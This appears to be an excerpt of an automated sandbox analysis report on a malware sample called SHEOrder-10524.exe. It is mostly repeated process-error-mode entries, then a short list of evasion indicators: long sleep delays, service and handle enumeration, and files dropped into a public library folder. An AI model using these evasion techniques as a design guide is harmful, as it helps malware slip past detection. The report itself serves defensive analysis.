                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040F7A7 Sleep,ExitProcess,4_2_0040F7A7
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040F7A7 Sleep,ExitProcess,4_1_0040F7A7
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A748
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_1_0041A748
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifWindow / User API: threadDelayed 614Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifWindow / User API: threadDelayed 9052Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifWindow / User API: foregroundWindowGot 1762Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-52545
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7460Thread sleep count: 130 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7460Thread sleep time: -65000s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464Thread sleep count: 614 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464Thread sleep time: -1842000s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464Thread sleep count: 9052 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif TID: 7464Thread sleep time: -27156000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028C58CC
